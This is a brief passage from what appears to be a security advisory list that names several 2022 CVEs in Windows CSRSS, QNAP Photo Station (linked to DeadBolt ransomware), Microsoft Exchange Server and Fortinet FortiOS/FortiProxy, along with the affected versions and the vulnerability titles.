Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047

 

CVE-2022-27593

QNAP

Certain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage

DeadBolt Ransomware

 

CVE-2022-41082

Microsoft

Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23

Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082

ACSC Alert:

Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange.

CVE-2022-40684

Fortinet

FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0

FortiOS / FortiProxy / FortiSwitchManager – Authentication bypass on administrative interface

 

Source…